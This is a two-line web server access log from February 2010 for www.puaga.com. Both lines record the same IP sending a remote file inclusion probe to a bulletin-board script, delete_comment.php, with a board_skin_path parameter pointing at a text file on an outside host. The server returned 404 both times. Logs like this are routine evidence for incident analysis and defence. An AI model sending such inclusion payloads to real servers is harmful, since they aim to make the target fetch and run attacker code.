91.206.206.28 - - [25/Feb/2010:05:48:23 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:48:30 -0800] "GET /logs/access_100206.log%20%20//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
